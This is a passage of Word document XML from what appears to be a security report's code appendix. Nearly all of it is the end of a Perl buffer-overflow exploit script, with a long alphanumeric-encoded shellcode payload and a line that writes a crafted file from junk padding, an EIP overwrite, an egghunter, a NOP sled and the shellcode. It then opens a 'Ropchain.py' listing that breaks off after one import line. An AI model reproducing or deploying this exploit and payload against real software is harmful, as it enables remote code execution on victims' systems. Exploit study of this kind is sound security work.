        </w:rPr>
        <w:t>"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="25512453" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="34EB5587" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x39\x49\x5a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="433CD98F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>"\x4b\x4d\x4b\x39\x49\x52\x54\x31\x34\x4c\x34\x46\x51\x48</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="107321A9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x52\x48\x32\x34\x37\x36\x51\x58\x49\x45\x34\x4c\x4b\x52</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2BDF1AA6" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x51\x50\x30\x4c\x4b\x32\x56\x34\x4c\x4c\x4b\x43\x46\x35</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="290E2C5F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x4c\x4c\x4b\x51\x56\x43\x38\x4c\x4b\x33\x4e\x37\x50\x4c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1FC8F8BA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x4b\x37\x46\x47\x48\x50\x4f\x55\x48\x54\x35\x4c\x33\x46</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7BFAC498" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x39\x33\x31\x58\x51\x4b\x4f\x4d\x31\x33\x50\x4c\x4b\x32</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5E54F0EE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x4c\x51\x34\x57\x54\x4c\x4b\x30\x45\x57\x4c\x4c\x4b\x56</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7BABC215" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x34\x51\x38\x33\x48\x35\x51\x4b\x5a\x4c\x4b\x50\x4a\x35</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0741A7DA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x48\x4c\x4b\x31\x4a\x51\x30\x33\x31\x5a\x4b\x4a\x43\x57</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7CD1125C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x44\x37\x39\x4c\x4b\x47\x44\x4c\x4b\x33\x31\x4a\x4e\x50</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7BBA4E27" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x31\x4b\x4f\x46\x51\x49\x50\x4b\x4c\x4e\x4c\x4d\x54\x39</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="35551C63" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x50\x53\x44\x45\x57\x4f\x31\x58\x4f\x34\x4d\x33\x31\x39</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1D2EE34D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x57\x4a\x4b\x5a\x54\x37\x4b\x33\x4c\x57\x54\x37\x58\x32</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2AD2B294" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x55\x4b\x51\x4c\x4b\x30\x5a\x31\x34\x55\x51\x4a\x4b\x55</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="701994AE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x31\x4a\x35\x4c\x53</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2069CAE7" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x31\x5a\x4b\x4c\x4b\x54\x44\x4c\x4b\x53\x31\x5a\x48\x4c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1599C4C8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x49\x51\x54\x46\x44\x35\x4c\x33\x51\x49\x53\x4f\x42\x33</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="471EDD5C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x38\x46\x49\x39\x44\x4c\x49\x4d\x35\x4c\x49\x39\x52\x33</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="061EEED0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x58\x4c\x4e\x30\x4e\x34\x4e\x4a\x4c\x31\x42\x4d\x38\x4d</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6BBC539D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4d\x59\x47\x35\x55\x54\x4f</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="32E094C3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x4b\x53\x4e\x39\x48\x4a\x42\x53\x43\x4b\x37\x45\x4c\x56</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6CB7D7E0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x44\x36\x32\x4a\x48\x4c\x4e\x4b\x4f\x4b\x4f\x4b\x4f\x4d</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="63E1A0D0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x59\x47\x35\x33\x38\x43\x58\x52\x4c\x32\x4c\x51\x30\x37</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="61E32FE4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x31\x33\x58\x37\x43\x30\x32\x56\x4e\x53\x54\x43\x58\x32</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="63B11FFB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x55\x53\x43\x33\x55\x54\x32\x50\x30\x49\x4b\x4b\x38\x51</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1D24DE71" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x4c\x37\x54\x44\x4a\x4b\x39\x4d\x36\x36\x36\x4b\x4f\x30</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A764B00" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x55\x35\x54\x4b\x39\x38\x42\x30\x50\x4f\x4b\x4e\x48\x39</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17281073" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x32\x50\x4d\x4f\x4c\x4c\x47\x55\x4c\x36\x44\x50\x52\x4b</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="770BD042" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x58\x51\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x42\x48\x32\x4f\x32</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1B4174EE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x58\x56\x38\x57\x50\x55\x38\x55\x31\x35\x37\x43\x55\x50</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="392F992A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x42\x32\x48\x30\x4d\x52\x45\x32\x53\x54\x33\x50\x31\x59</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7213BDC4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x4b\x4b\x38\x51\x4c\x46\x44\x55\x5a\x4d\x59\x4d\x33\x32</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A63FC6A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x48\x30\x58\x37\x50\x51\x30\x31\x30\x53\x58\x30\x4d\x31</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="68D76438" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x43\x57\x36\x51\x31\x33\x58\x44\x32\x42\x4f\x52\x4d\x57</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A2C9FF9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x50\x53\x58\x32\x4f\x56\x4c\x47\x50\x52\x46\x52\x48\x51</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0D01CEF4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x58\x35\x35\x32\x4c\x52\x4c\x30\x31\x58\x49\x4d\x58\x50</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="196D22A9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x4c\x47\x54\x34\x50\x4b\x39\x4b\x51\x30\x31\x49\x42\x51</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0AD773D5" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x42\x50\x53\x36\x31\x50\x52\x4b\x4f\x4e\x30\x50\x31\x4f</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="06835BF8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>"\x30\x36\x30\x4b\x4f\x56\x35\x35\x58\x41\x41</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="786BE54C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E489B41" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>open($FILE,"&gt;$file"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2278F630" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>print $FILE $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>start.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>junk1.$eip.$egghunter.$nop.$tag.$shellcode;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158966A8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>close($FILE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5333FEFE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc71564027"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Ropchain.py</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="0CCA2673" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>struct</w:t>
